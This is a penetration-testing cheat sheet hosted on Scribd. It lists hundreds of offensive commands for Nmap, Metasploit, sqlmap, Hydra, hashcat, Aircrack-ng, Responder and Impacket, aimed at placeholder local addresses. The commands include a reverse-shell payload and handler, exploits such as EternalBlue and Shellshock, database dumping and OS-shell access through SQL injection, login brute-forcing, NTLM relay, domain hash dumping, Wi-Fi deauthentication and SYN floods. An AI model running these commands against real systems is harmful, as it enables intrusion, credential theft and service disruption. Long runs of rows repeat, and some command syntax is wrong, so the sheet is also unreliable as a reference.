Scribd
Upload
471 views

Penetration Testing Commands

Uploaded by

Phani Mohan Kopalle
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
471 views

Penetration Testing Commands

Uploaded by

Phani Mohan Kopalle
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 22

Guide of Penetration

Testing Commands

Prepared by
Mohammed AlSubayt
By Mohammed AlSubayt

Guide of Penetration Testing Commands

Table of Contents

Nmap Commands 2

Metasploit Commands 4

Nikto Commands 6

Sqlmap Commands 7

Hydra Commands 8

John the Ripper Commands 10

Aircrack-ng Commands 11

Wireshark and Tshark Commands 12

Other Commands 13
By Mohammed AlSubayt
Nmap Commands

No. Command Explanation


1 nmap -sP 192.168.1.0/24 Scan the network to discover active
devices.
2 nmap -sS 192.168.1.1 Perform a TCP SYN scan to detect open
ports on the device.
3 nmap -sV 192.168.1.1 Detect the versions of services running on
open ports.
4 nmap -O 192.168.1.1 Determine the operating system used on
the device.
5 nmap -A 192.168.1.1 Comprehensive scan including open ports,
service versions, and OS detection.
6 nmap -Pn 192.168.1.1 Scan devices even if they do not respond
to Ping requests.
7 nmap -sU 192.168.1.1 Scan for open UDP ports.
8 nmap -p- 192.168.1.1 Scan all ports (1-65535) instead of just
default ports.
9 nmap --script vuln 192.168.1.1 Use scripts to check for vulnerabilities.
10 nmap --script smb-enum-shares -p 445 Enumerate SMB shares using Nmap script.
192.168.1.1
11 nmap --script http-enum -p 80 192.168.1.1 Enumerate web server directories using
Nmap script.
12 nmap --script smb-vuln-ms17-010 192.168.1.1 Check for MS17-010 (EternalBlue)
vulnerability.
13 nmap --script smb-vuln-cve-2017-7494 Check for CVE-2017-7494 (SambaCry)
192.168.1.1 vulnerability.
14 nmap --script smb-vuln-ms08-067 192.168.1.1 Check for MS08-067 vulnerability.
15 nmap --script smb-vuln-ms10-061 192.168.1.1 Check for MS10-061 (Print Spooler)
vulnerability.
16 nmap --script smb-vuln-regsvc-dos Check for registry service DoS
192.168.1.1 vulnerability.
17 nmap --script http-sql-injection --script- Check for SQL injection vulnerabilities
args='http-sql-injection.args' -p 80 192.168.1.1 using Nmap script.
18 nmap -sL 192.168.1.0/24 List all IPs in the subnet without scanning
them.
19 nmap -p80 --script http-methods 192.168.1.1 Discover allowed HTTP methods on a web
server.
20 nmap -p80 --script http-title 192.168.1.1 Retrieve the title of the webpage.
21 nmap -p80 --script http-headers 192.168.1.1 Retrieve HTTP headers from the server.
22 nmap -p80 --script http-enum 192.168.1.1 Enumerate common web applications on
the server.
23 nmap -p80 --script http-auth 192.168.1.1 Test for HTTP authentication methods.
24 nmap -sX 192.168.1.1 Xmas scan to detect open ports.
25 nmap -sA 192.168.1.1 ACK scan to map firewall rulesets.
By Mohammed AlSubayt
26 nmap -sW 192.168.1.1 Window scan to detect open ports based
on TCP window size.
27 nmap -sM 192.168.1.1 Maimon scan to detect open ports using
FIN/ACK flag combination.
28 nmap -p80 --script http-userdir-enum Enumerate user directories on a web
192.168.1.1 server.
29 nmap -p80 --script http-passwd 192.168.1.1 Check for /etc/passwd file on web server.
30 nmap -p80 --script http-robots.txt 192.168.1.1 Retrieve and analyze the robots.txt file.
31 nmap --script ssh-brute -p 22 192.168.1.1 Brute-force SSH login using Nmap script.
32 nmap --script ftp-anon 192.168.1.1 Check for anonymous FTP login.
33 nmap --script ftp-vsftpd-backdoor 192.168.1.1 Check for vsftpd backdoor vulnerability.
34 nmap --script http-sql-injection --script- Check for SQL injection vulnerabilities
args='http-sql-injection.args' -p 80 192.168.1.1 using Nmap script.
35 nmap --script http-phpself-xss 192.168.1.1 Check for PHP_SELF XSS vulnerabilities.
36 nmap --script dns-brute 192.168.1.1 Perform DNS brute-force enumeration.
37 nmap -p 22 --script ssh-hostkey 192.168.1.1 Retrieve SSH host keys.
38 nmap -p 53 --script dns-recursion 192.168.1.1 Check for DNS recursion.
39 nmap --traceroute 192.168.1.1 Perform a traceroute along with the scan.
40 nmap -sn 192.168.1.0/24 Ping scan to discover live hosts without
port scanning.
By Mohammed AlSubayt
Metasploit Commands

No. Command Explanation


1 metasploit Launch the Metasploit framework
for exploit development and
execution.
2 msfconsole Open the Metasploit console
interface.
3 msfvenom -p windows/meterpreter/reverse_tcp Generate a Metasploit payload.
LHOST=192.168.1.2 LPORT=4444 -f exe > shell.exe
4 msfconsole -r script.rc Run Metasploit commands from a
script file.
5 msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue; Exploit EternalBlue vulnerability.
set RHOST 192.168.1.1; exploit"
6 msfconsole -x "use exploit/multi/handler; set PAYLOAD Setup and run a multi-handler for
windows/meterpreter/reverse_tcp; set LHOST 192.168.1.2; set reverse TCP payloads.
LPORT 4444; exploit"
7 msfconsole -x "use exploit/windows/smb/psexec; set RHOST Exploit SMB with psexec.
192.168.1.1; set SMBUser user; set SMBPass pass; exploit"
8 msfconsole -x "use auxiliary/scanner/portscan/tcp; set RHOSTS TCP port scan using Metasploit.
192.168.1.0/24; set THREADS 10; run"
9 msfconsole -x "use auxiliary/scanner/http/http_version; set Scan HTTP versions on a network.
RHOSTS 192.168.1.0/24; run"
10 msfconsole -x "use auxiliary/scanner/ftp/ftp_login; set RHOSTS Brute-force FTP login.
192.168.1.0/24; set USER_FILE /path/to/users.txt; set PASS_FILE
/path/to/passwords.txt; run"
11 msfconsole -x "use auxiliary/scanner/ssh/ssh_login; set RHOSTS Brute-force SSH login.
192.168.1.0/24; set USER_FILE /path/to/users.txt; set PASS_FILE
/path/to/passwords.txt; run"
12 msfconsole -x "use auxiliary/scanner/smb/smb_version; set Scan SMB versions on a network.
RHOSTS 192.168.1.0/24; run"
13 msfconsole -x "use auxiliary/scanner/smb/smb_enumshares; set Enumerate SMB shares on a
RHOSTS 192.168.1.0/24; run" network.
14 msfconsole -x "use auxiliary/scanner/smb/smb_enumusers; set Enumerate SMB users on a
RHOSTS 192.168.1.0/24; run" network.
15 msfconsole -x "use auxiliary/scanner/rdp/rdp_scanner; set RHOSTS Scan for RDP services on a
192.168.1.0/24; run" network.
16 msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set Exploit MS08-067 vulnerability.
RHOST 192.168.1.1; exploit"
17 msfconsole -x "use exploit/unix/ftp/vsftpd_234_backdoor; set Exploit vsftpd 2.3.4 backdoor.
RHOST 192.168.1.1; exploit"
18 msfconsole -x "use exploit/windows/dcerpc/ms03_026_dcom; set Exploit MS03-026 vulnerability.
RHOST 192.168.1.1; exploit"
19 msfconsole -x "use exploit/windows/smb/psexec; set RHOST Execute commands on Windows
192.168.1.1; set SMBUser user; set SMBPass pass; exploit" via SMB and psexec.
By Mohammed AlSubayt
20 msfconsole -x "use Exploit Shellshock vulnerability.
exploit/linux/http/apache_mod_cgi_bash_env_exec; set RHOST
192.168.1.1; exploit"
21 msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue; Exploit EternalBlue vulnerability.
set RHOST 192.168.1.1; exploit"
22 msfconsole -x "use exploit/multi/http/struts2_content_type_ognl; Exploit Struts2 Content-Type
set RHOST 192.168.1.1; exploit" OGNL injection.
23 msfconsole -x "use exploit/unix/webapp/drupal_drupalgeddon2; Exploit Drupalgeddon2
set RHOST 192.168.1.1; exploit" vulnerability.
24 msfconsole -x "use exploit/multi/php/php_cgi_arg_injection; set Exploit PHP CGI Argument
RHOST 192.168.1.1; exploit" Injection.
25 msfconsole -x "use Exploit MS14-064 OLE Code
exploit/windows/browser/ms14_064_ole_code_execution; set Execution.
RHOST 192.168.1.1; exploit"
By Mohammed AlSubayt
Nikto Commands

No. Command Explanation


1 nikto -h http://192.168.1.1 Scan web servers to detect vulnerabilities.
2 nikto -h http://192.168.1.1 -Plugins Run specific plugins for detailed scanning.
3 nikto -h http://192.168.1.1 -C all Comprehensive web server scan with all
tests.
4 nikto -h http://192.168.1.1 -Tuning 1 Tune the scan to only check for interesting
files.
5 nikto -h http://192.168.1.1 -Format msf+ Export vulnerabilities to Metasploit.
6 nikto -h http://192.168.1.1 -Plugins robots Check for robots.txt vulnerabilities.
7 nikto -h http://192.168.1.1 -Plugins Check for file upload vulnerabilities.
fileupload
8 nikto -h http://192.168.1.1 -Plugins Check for Shellshock vulnerability.
shellshock
9 nikto -h http://192.168.1.1 -Plugins Check for Heartbleed vulnerability.
heartbleed
10 nikto -h http://192.168.1.1 -Plugins poodle Check for POODLE vulnerability.
11 nikto -h http://192.168.1.1 -output Generate a vulnerability report for a web
report.html server.
12 nikto -h http://192.168.1.1 -Plugins cgi Check for CGI vulnerabilities.
13 nikto -h http://192.168.1.1 -Plugins apache Check for Apache-specific vulnerabilities.
14 nikto -h http://192.168.1.1 -Plugins iis Check for IIS-specific vulnerabilities.
15 nikto -h http://192.168.1.1 -Plugins horde Check for Horde-specific vulnerabilities.
16 nikto -h http://192.168.1.1 -Plugins nessus Check for Nessus compatibility.
17 nikto -h http://192.168.1.1 -Plugins php Check for PHP-specific vulnerabilities.
18 nikto -h http://192.168.1.1 -Plugins ssl Check for SSL/TLS-specific vulnerabilities.
19 nikto -h http://192.168.1.1 -Plugins generic Run generic tests for common
vulnerabilities.
20 nikto -h http://192.168.1.1 -Plugins msf Check for Metasploit integration.
21 nikto -h http://192.168.1.1 -Plugins tomcat Check for Tomcat-specific vulnerabilities.
By Mohammed AlSubayt
Sqlmap Commands

No. Command Explanation


1 sqlmap -u "http://192.168.1.1/vuln.php?id=1" --dbs Detect and exploit SQL injection
vulnerabilities.
2 sqlmap -u "http://192.168.1.1/vuln.php?id=1" --dump Dump the database content after
finding SQL injection.
3 sqlmap -u "http://192.168.1.1/vuln.php?id=1" --os-shell Obtain an OS shell through SQL
injection.
4 sqlmap -u "http://192.168.1.1/vuln.php?id=1" -- Bypass WAF by using tamper
tamper=space2comment scripts.
5 sqlmap -u "http://192.168.1.1/vuln.php?id=1" --hex Use hexadecimal encoding for
payloads.
6 sqlmap -u "http://192.168.1.1/vuln.php?id=1" -- Specify the DBMS to use specific
dbms=mysql payloads.
7 sqlmap -u "http://192.168.1.1/vuln.php?id=1" -- Retrieve the DBMS user
privileges privileges.
8 sqlmap -u "http://192.168.1.1/vuln.php?id=1" --level=5 Advanced SQL injection testing
--risk=3 with high risk and level.
9 sqlmap -u "http://192.168.1.1/vuln.php?id=1" -- Retrieve DBMS password hashes.
passwords
10 sqlmap -u "http://192.168.1.1/vuln.php?id=1" --roles Retrieve DBMS roles.
11 sqlmap -u "http://192.168.1.1/vuln.php?id=1" --schema Retrieve the DBMS schema.
12 sqlmap -u "http://192.168.1.1/vuln.php?id=1" --count Count the number of entries in
tables.
13 sqlmap -u "http://192.168.1.1/vuln.php?id=1" --search - Search for specific strings in the
T users --string="admin" database.
14 sqlmap -u "http://192.168.1.1/vuln.php?id=1" --batch Run SQLmap in non-interactive
mode.
15 sqlmap -u "http://192.168.1.1/vuln.php?id=1" --delay=5 Add a delay between each
request.
16 sqlmap -u "http://192.168.1.1/vuln.php?id=1" -- Set a timeout for each request.
timeout=10
17 sqlmap -u "http://192.168.1.1/vuln.php?id=1" -- Set the number of retries for
retries=3 each request.
18 sqlmap -u "http://192.168.1.1/vuln.php?id=1" --tor Use Tor network for anonymity.
19 sqlmap -u "http://192.168.1.1/vuln.php?id=1" --check- Check if the Tor network is used
tor correctly.
20 sqlmap -u "http://192.168.1.1/vuln.php?id=1" -- Use a proxy for requests.
proxy=http://127.0.0.1:8080
By Mohammed AlSubayt
Hydra Commands

No. Command Explanation


1 hydra -l admin -P /path/to/passwords.txt Brute-force SSH login using a
192.168.1.1 ssh password list.
2 hydra -l admin -P /path/to/passwords.txt -s 2222 Brute-force SSH on a non-standard
ssh://192.168.1.1 port.
3 hydra -l admin -P /path/to/passwords.txt http- Brute-force HTTP GET authentication.
get://192.168.1.1
4 hydra -l admin -P /path/to/passwords.txt http- Brute-force HTTP POST login form.
post-form://192.168.1.1/login.php
5 hydra -L users.txt -P passwords.txt 192.168.1.1 ssh Brute-force SSH with multiple
usernames.
6 hydra -L users.txt -P passwords.txt Brute-force SMB authentication.
smb://192.168.1.1
7 hydra -l admin -P /path/to/passwords.txt Brute-force FTP login.
ftp://192.168.1.1
8 hydra -l admin -P /path/to/passwords.txt Brute-force SSH login using Hydra.
192.168.1.1 ssh
9 hydra -l admin -P /path/to/passwords.txt http- Brute-force HTTP GET login form.
get://192.168.1.1/login.php
10 hydra -l admin -P /path/to/passwords.txt http- Brute-force HTTP POST login form.
post-form://192.168.1.1/login.php
11 hydra -l admin -P /path/to/passwords.txt -e nsr Brute-force SSH with
192.168.1.1 ssh null/single/reverse password
guesses.
12 hydra -l admin -P /path/to/passwords.txt -t 4 Set the number of parallel
192.168.1.1 ssh connections to 4 for SSH brute-
forcing.
13 hydra -L users.txt -P passwords.txt http- Brute-force HTTP GET login with
get://192.168.1.1 multiple usernames.
14 hydra -L users.txt -P passwords.txt http-post- Brute-force HTTP POST login with
form://192.168.1.1/login.php multiple usernames.
15 hydra -l admin -P /path/to/passwords.txt -f Stop after the first found password for
192.168.1.1 ssh SSH.
16 hydra -l admin -P /path/to/passwords.txt -s 21 Brute-force FTP login on port 21.
192.168.1.1 ftp
17 hydra -L users.txt -P passwords.txt -o results.txt Save results to a file.
192.168.1.1 ssh
18 hydra -l admin -P /path/to/passwords.txt -V Verbose mode to show each attempt.
192.168.1.1 ssh
19 hydra -l admin -P /path/to/passwords.txt -M Brute-force SSH on multiple targets
targets.txt ssh listed in a file.
20 hydra -l admin -P /path/to/passwords.txt -R Restore a previous session.
By Mohammed AlSubayt
21 hydra -l admin -P /path/to/passwords.txt -e nsr Brute-force SSH with
192.168.1.1 ssh null/single/reverse password
guesses.
22 hydra -l admin -P /path/to/passwords.txt -t 4 Set the number of parallel
192.168.1.1 ssh connections to 4 for SSH brute-
forcing.
23 hydra -L users.txt -P passwords.txt http- Brute-force HTTP GET login with
get://192.168.1.1 multiple usernames.
24 hydra -L users.txt -P passwords.txt http-post- Brute-force HTTP POST login with
form://192.168.1.1/login.php multiple usernames.
25 hydra -l admin -P /path/to/passwords.txt -f Stop after the first found password for
192.168.1.1 ssh SSH.
26 hydra -l admin -P /path/to/passwords.txt -s 21 Brute-force FTP login on port 21.
192.168.1.1 ftp
27 hydra -L users.txt -P passwords.txt -o results.txt Save results to a file.
192.168.1.1 ssh
28 hydra -l admin -P /path/to/passwords.txt -V Verbose mode to show each attempt.
192.168.1.1 ssh
29 hydra -l admin -P /path/to/passwords.txt -M Brute-force SSH on multiple targets
targets.txt ssh listed in a file.
30 hydra -l admin -P /path/to/passwords.txt -R Restore a previous session.
By Mohammed AlSubayt
John the Ripper Commands

No. Command Explanation


1 john /path/to/hashfile Crack password hashes using John the
Ripper.
2 john --wordlist=/path/to/wordlist Password cracking using a wordlist.
/path/to/hashfile
3 john --format=NT /path/to/hashfile Crack NTLM password hashes.
4 john --rules --wordlist=/path/to/wordlist Use wordlist and apply rules for
/path/to/hashfile password cracking.
5 john --show /path/to/hashfile Show cracked passwords from the hash
file.
6 john --format=raw-md5 /path/to/hashfile Crack raw MD5 password hashes.
7 john --incremental /path/to/hashfile Use incremental mode for password
cracking.
8 john --single /path/to/hashfile Use single crack mode for password
cracking.
9 john --wordlist=/path/to/wordlist --rules Use wordlist with rules for password
/path/to/hashfile cracking.
10 john --session=custom_session /path/to/hashfile Save the cracking session with a
custom name.
11 john --restore=custom_session Restore a saved cracking session.
12 john --status=custom_session Show the status of a cracking session.
13 john --pot=/path/to/potfile /path/to/hashfile Specify a custom pot file for cracked
passwords.
14 john --nolog /path/to/hashfile Disable logging.
By Mohammed AlSubayt
Aircrack-ng Commands

No. Command Explanation


1 aircrack-ng -a2 -b [BSSID] -w Crack WPA/WPA2-PSK passwords.
/path/to/wordlist.cap
2 aircrack-ng -e SSID -w /path/to/wordlist Crack WPA handshake with specific SSID.
/path/to/capture.cap
3 airodump-ng wlan0 Capture packets and display wireless
networks.
4 aireplay-ng -0 10 -a [BSSID] wlan0 Deauthenticate clients to capture
handshakes.
5 airodump-ng -c 6 --bssid [BSSID] -w capture Capture packets on a specific channel and
wlan0 BSSID.
6 aircrack-ng -z /path/to/capture.cap Use PTW attack against WEP.
7 aircrack-ng -k 1 /path/to/capture.cap Use KoreK attack against WEP.
8 airodump-ng --band abg wlan0 Capture packets on all wireless bands (a,
b, g).
9 aireplay-ng -3 -b [BSSID] wlan0 Perform ARP replay attack to generate
traffic.
10 aireplay-ng -9 wlan0 Perform injection test to check if card
supports injection.
11 aireplay-ng -1 0 -e [SSID] -a [BSSID] -h [MAC] Fake authentication attack to associate
wlan0 with the AP.
12 aireplay-ng -2 -r /path/to/arp-request wlan0 Interactive packet replay attack.
13 airodump-ng --write /path/to/output wlan0 Write captured packets to a file.
14 airbase-ng -e "Free WiFi" -c 6 wlan0 Create a fake access point.
15 airdecap-ng -e [SSID] /path/to/capture.cap Decrypt WEP/WPA packets with known
key.
By Mohammed AlSubayt
Wireshark and Tshark Commands

No. Command Explanation


1 wireshark Network protocol analyzer for graphical packet capture and
analysis.
2 tshark -i eth0 Command-line version of Wireshark.
3 tcpdump -i eth0 Capture network traffic on interface eth0.
4 tcpdump -i eth0 port 80 Capture network traffic on port 80.
5 tcpdump -i eth0 -w Capture network traffic and save to file.
capture.pcap
6 tshark -r capture.pcap Read and analyze a pcap file.
By Mohammed AlSubayt
Other Commands

No. Command Explanation


1 burpsuite Launch Burp Suite for web
application security testing.
2 zaproxy Launch OWASP ZAP for web
application security testing.
3 dirb http://192.168.1.1 /path/to/wordlist Directory brute-forcing to discover
hidden files and directories.
4 gobuster dir -u http://192.168.1.1 -w Directory brute-forcing using
/path/to/wordlist Gobuster.
5 wfuzz -c -z file,/path/to/wordlist -u Fuzzing tool for web application
http://192.168.1.1/FUZZ testing.
6 ffuf -w /path/to/wordlist -u Fast web fuzzer for discovering
http://192.168.1.1/FUZZ hidden files and directories.
7 hping3 -S -p 80 -c 1 192.168.1.1 Send a single SYN packet to test if
port 80 is open.
8 dnsenum example.com DNS enumeration to gather
information about a domain.
9 theHarvester -d example.com -l 500 -b google Gather emails, subdomains, and
other information from search
engines.
10 maltego Open-source intelligence (OSINT)
and forensics application.
11 recon-ng Web reconnaissance framework for
OSINT gathering.
12 crackmapexec smb 192.168.1.1 -u user -p password - Enumerate SMB shares with
-shares credentials.
13 crackmapexec smb 192.168.1.1 -u user -p password - Execute commands on the target
-exec 'cmd.exe /c whoami' via SMB.
14 responder -I eth0 Network poisoning tool to capture
SMB/NTLM hashes.
15 ntlmrelayx.py -smb2support -i Relay captured NTLM hashes to
SMB service.
16 smbrelayx.py -h 192.168.1.1 -c "whoami" Relay NTLM hashes to execute
commands on the target.
17 responder -I eth0 -w Run Responder in full analysis
mode.
18 hashcat -a 0 -m 0 /path/to/hashfile High-performance password
/path/to/wordlist cracking.
19 hashcat -a 3 -m 0 /path/to/hashfile ?a?a?a?a?a?a Mask attack with brute-force for
passwords of length 6.
20 hashcat -a 3 -m 1000 /path/to/hashfile ?l?l?l?l Mask attack with lowercase letters
for NTLM hashes.
21 hashcat -a 0 -m 1800 /path/to/hashfile Dictionary attack on SHA-512
/path/to/wordlist hashes.
By Mohammed AlSubayt
22 hashcat -a 1 -m 0 /path/to/hashfile Combinator attack using two
/path/to/wordlist /path/to/rules wordlists.
23 hashcat -a 6 -m 0 /path/to/hashfile Hybrid attack with dictionary and
/path/to/wordlist ?d?d 2-digit suffix.
24 hcxdumptool -i wlan0 -o capture.pcapng -- Capture handshakes and PMKID for
enable_status=1 WPA cracking.
25 hcxtools -m /path/to/pmkid Extract PMKID from the capture
/path/to/capture.pcapng file.
26 reaver -i wlan0 -b [BSSID] -vv Perform a brute-force attack on
WPS PIN.
27 wifite Automated wireless attack tool to
crack WEP/WPA/WPA2.
28 legion Automated network penetration
testing framework.
29 patator Multi-purpose brute-forcer and
enumerator.
30 medusa -h 192.168.1.1 -u admin -P Brute-force SSH login using
/path/to/passwords.txt -M ssh Medusa.
31 bloodhound-python -d example.com -u user -p Active Directory enumeration tool.
password -c all
32 impacket-getTGT user Get a Kerberos TGT using Impacket.

-dc-ip 192.168.1.1
33 impacket-secretsdump -just-dc-ntlm 192.168.1.1 Dump NTLM hashes from a domain
controller.
34 impacket-psexec -target 192.168.1.1 -u user -p Remote command execution via
password SMB.
35 impacket-wmiexec -target 192.168.1.1 -u user -p Remote command execution via
password WMI.
36 impacket-smbexec -target 192.168.1.1 -u user -p Remote command execution via
password SMB.
37 sslscan 192.168.1.1 SSL/TLS scanner to detect
supported protocols and ciphers.
38 sslyze --regular 192.168.1.1 SSL/TLS configuration scanner.
39 openssl s_client -connect 192.168.1.1:443 Test SSL/TLS connection to a
server.
40 testssl.sh 192.168.1.1 Test SSL/TLS security on a server.
41 curl -I http://192.168.1.1 Fetch HTTP headers to gather
information about the server.
42 curl -X POST -d "username=admin&password=1234" Send HTTP POST request to login
http://192.168.1.1/login.php form.
43 curl -O http://192.168.1.1/file.txt Download a file from a web server.
44 curl -H "User-Agent: Mozilla/5.0" http://192.168.1.1 Send a request with a custom User-
Agent header.
45 curl -k https://192.168.1.1 Ignore SSL certificate errors.
46 dirb http://192.168.1.1 /path/to/wordlist Directory brute-forcing to discover
hidden files and directories.
By Mohammed AlSubayt
47 gobuster dir -u http://192.168.1.1 -w Directory brute-forcing using
/path/to/wordlist Gobuster.
48 wfuzz -c -z file,/path/to/wordlist -u Fuzzing tool to discover hidden files
http://192.168.1.1/FUZZ or directories.
49 ffuf -w /path/to/wordlist -u Fast web fuzzer for discovering
http://192.168.1.1/FUZZ hidden files and directories.
50 wfuzz -c -z file,/path/to/wordlist -b Fuzz URLs with session cookies.
"cookie=SESSIONID" -u http://192.168.1.1/FUZZ
51 zap-baseline.py -t http://192.168.1.1 Automated scan using OWASP ZAP
baseline scan.
52 droopescan scan drupal -u http://192.168.1.1 Scan Drupal CMS for vulnerabilities.
53 joomscan --url http://192.168.1.1 Scan Joomla CMS for vulnerabilities.
54 wpscan --url http://192.168.1.1 --enumerate u Enumerate WordPress users.
55 wpscan --url http://192.168.1.1 --plugins-detection Detect WordPress plugins.
mixed
56 searchsploit Search for exploit code using
Exploit-DB.
57 searchsploit -m 12345 Mirror an exploit to the current
directory.
58 ike-scan 192.168.1.1 Scan and identify IKE VPN servers.
59 yersinia Network attack tool for Layer 2
protocols.
60 mitmf Man-in-the-middle framework for
network attacks.
61 setoolkit Social engineering toolkit for
phishing and other attacks.
62 beef Browser Exploitation Framework
for client-side attacks.
63 netcat -nv 192.168.1.1 80 Simple TCP connection to test a
specific port.
64 netcat -lvp 4444 Listen for incoming connections on
port 4444.
65 netcat -zv 192.168.1.1 1-65535 Scan all ports using Netcat.
66 smbclient -L //192.168.1.1 -U username List SMB shares on a remote server.
67 smbmap -H 192.168.1.1 -u username -p password Enumerate SMB shares and
permissions.
68 impacket-smbclient //192.168.1.1/share -user SMB client from Impacket toolkit.
username
69 ldapsearch -h 192.168.1.1 -x -b LDAP enumeration.
"dc=example,dc=com"
70 cewl http://192.168.1.1 -w wordlist.txt Generate a custom wordlist from a
website.
71 wfuzz -c -z file,/path/to/wordlist -u Fuzz URLs for hidden files and
http://192.168.1.1/FUZZ directories.
72 dnsenum example.com DNS enumeration tool for finding
subdomains.
By Mohammed AlSubayt
73 dnsrecon -d example.com -t brt -D Brute-force DNS subdomains.
/path/to/wordlist.txt
74 dnsenum --enum example.com Comprehensive DNS enumeration.
75 dnsmap example.com DNS mapping and subdomain
discovery tool.
76 masscan -p1-65535 192.168.1.1 Fast port scanner for large
networks.
77 zmap -p 80 192.168.1.0/24 Fast network scanner focused on
speed.
78 recon-ng Web reconnaissance framework for
information gathering.
79 fping -a -g 192.168.1.0/24 Ping sweep to discover live hosts.
80 hping3 -1 192.168.1.1 Send ICMP echo request to test
connectivity.
81 hping3 -S 192.168.1.1 -p 80 Send TCP SYN packet to test if port
80 is open.
82 hping3 -A 192.168.1.1 -p 80 Send TCP ACK packet to test if port
80 is open.
83 hping3 -2 192.168.1.1 -p 53 Send UDP packet to test if port 53 is
open.
84 hping3 -8 80 -c 1000 -S 192.168.1.1 Send 1000 SYN packets to port 80
to test for SYN flood.
85 hping3 -Q -p 80 -s 192.168.1.1 Sequence number analysis for TCP
ports.
86 fping -a -g 192.168.1.0/24 Ping sweep to discover live hosts.
87 hping3 --flood -V -p 80 192.168.1.1 Send continuous SYN packets to
flood a specific port.
88 masscan -p80,443 192.168.1.0/24 Fast port scanner for large
networks.
89 zmap -p 80 192.168.1.0/24 Fast network scanner focused on
speed.
90 whois example.com Retrieve domain registration
information.
91 dig example.com any Retrieve DNS records for a domain.
92 nslookup example.com Retrieve DNS records using
nslookup.
93 fierce -dns example.com DNS reconnaissance and
enumeration tool.
94 dmitry -winsepfb http://192.168.1.1 Deepmagic Information Gathering
Tool.
95 theHarvester -d example.com -l 500 -b google Gather emails, subdomains, and
other information from search
engines.
96 maltego Open-source intelligence and
forensics application.
97 spiderfoot Automate OSINT gathering and
analysis.
By Mohammed AlSubayt
98 ike-scan 192.168.1.1 Scan and identify IKE VPN servers.
99 searchsploit Search for exploit code using
Exploit-DB.
100 searchsploit -m 12345 Mirror an exploit to the current
directory.
101 setoolkit Social engineering toolkit for
phishing and other attacks.
102 beef Browser Exploitation Framework
for client-side attacks.
103 netcat -nv 192.168.1.1 80 Simple TCP connection to test a
specific port.
104 netcat -lvp 4444 Listen for incoming connections on
port 4444.
105 netcat -zv 192.168.1.1 1-65535 Scan all ports using Netcat.
106 smbclient -L //192.168.1.1 -U username List SMB shares on a remote server.
107 smbmap -H 192.168.1.1 -u username -p password Enumerate SMB shares and
permissions.
108 impacket-smbclient //192.168.1.1/share -user SMB client from Impacket toolkit.
username
109 ldapsearch -h 192.168.1.1 -x -b LDAP enumeration.
"dc=example,dc=com"
110 cewl http://192.168.1.1 -w wordlist.txt Generate a custom wordlist from a
website.
111 wfuzz -c -z file,/path/to/wordlist -u Fuzz URLs for hidden files and
http://192.168.1.1/FUZZ directories.
112 dnsenum example.com DNS enumeration tool for finding
subdomains.
113 dnsrecon -d example.com -t brt -D Brute-force DNS subdomains.
/path/to/wordlist.txt
114 dnsenum --enum example.com Comprehensive DNS enumeration.
115 dnsmap example.com DNS mapping and subdomain
discovery tool.
116 masscan -p1-65535 192.168.1.1 Fast port scanner for large
networks.
117 zmap -p 80 192.168.1.0/24 Fast network scanner focused on
speed.
118 recon-ng Web reconnaissance framework for
information gathering.
119 fping -a -g 192.168.1.0/24 Ping sweep to discover live hosts.
120 hping3 -1 192.168.1.1 Send ICMP echo request to test
connectivity.
121 hping3 -S 192.168.1.1 -p 80 Send TCP SYN packet to test if port
80 is open.
122 hping3 -A 192.168.1.1 -p 80 Send TCP ACK packet to test if port
80 is open.
123 hping3 -2 192.168.1.1 -p 53 Send UDP packet to test if port 53 is
open.
By Mohammed AlSubayt
124 hping3 -8 80 -c 1000 -S 192.168.1.1 Send 1000 SYN packets to port 80
to test for SYN flood.
125 hping3 -Q -p 80 -s 192.168.1.1 Sequence number analysis for TCP
ports.
126 fping -a -g 192.168.1.0/24 Ping sweep to discover live hosts.
127 hping3 --flood -V -p 80 192.168.1.1 Send continuous SYN packets to
flood a specific port.
128 masscan -p80,443 192.168.1.0/24 Fast port scanner for large
networks.
129 zmap -p 80 192.168.1.0/24 Fast network scanner focused on
speed.
130 whois example.com Retrieve domain registration
information.
131 dig example.com any Retrieve DNS records for a domain.
132 nslookup example.com Retrieve DNS records using
nslookup.
133 fierce -dns example.com DNS reconnaissance and
enumeration tool.
134 dmitry -winsepfb http://192.168.1.1 Deepmagic Information Gathering
Tool.
135 theHarvester -d example.com -l 500 -b google Gather emails, subdomains, and
other information from search
engines.
136 maltego Open-source intelligence and
forensics application.
137 spiderfoot Automate OSINT gathering and
analysis.
138 ike-scan 192.168.1.1 Scan and identify IKE VPN servers.
139 searchsploit Search for exploit code using
Exploit-DB.
140 searchsploit -m 12345 Mirror an exploit to the current
directory.
141 responder -I eth0 Network poisoning tool to capture
SMB/NTLM hashes.
142 ntlmrelayx.py -smb2support -i Relay captured NTLM hashes to
SMB service.
143 smbrelayx.py -h 192.168.1.1 -c "whoami" Relay NTLM hashes to execute
commands on the target.
144 responder -I eth0 -w Run Responder in full analysis
mode.
145 hashcat -a 0 -m 0 /path/to/hashfile High-performance password
/path/to/wordlist cracking.
146 hashcat -a 3 -m 0 /path/to/hashfile ?a?a?a?a?a?a Mask attack with brute-force for
passwords of length 6.
147 hashcat -a 3 -m 1000 /path/to/hashfile ?l?l?l?l Mask attack with lowercase letters
for NTLM hashes.
By Mohammed AlSubayt
148 hashcat -a 0 -m 1800 /path/to/hashfile Dictionary attack on SHA-512
/path/to/wordlist hashes.
149 hashcat -a 1 -m 0 /path/to/hashfile Combinator attack using two
/path/to/wordlist /path/to/rules wordlists.
150 hashcat -a 6 -m 0 /path/to/hashfile Hybrid attack with dictionary and
/path/to/wordlist ?d?d 2-digit suffix.
151 setoolkit Social engineering toolkit for
phishing and other attacks.
152 beef Browser Exploitation Framework
for client-side attacks.
153 netcat -nv 192.168.1.1 80 Simple TCP connection to test a
specific port.
154 netcat -lvp 4444 Listen for incoming connections on
port 4444.
155 netcat -zv 192.168.1.1 1-65535 Scan all ports using Netcat.
156 smbclient -L //192.168.1.1 -U username List SMB shares on a remote server.
157 smbmap -H 192.168.1.1 -u username -p password Enumerate SMB shares and
permissions.
158 impacket-smbclient //192.168.1.1/share -user SMB client from Impacket toolkit.
username
159 ldapsearch -h 192.168.1.1 -x -b LDAP enumeration.
"dc=example,dc=com"
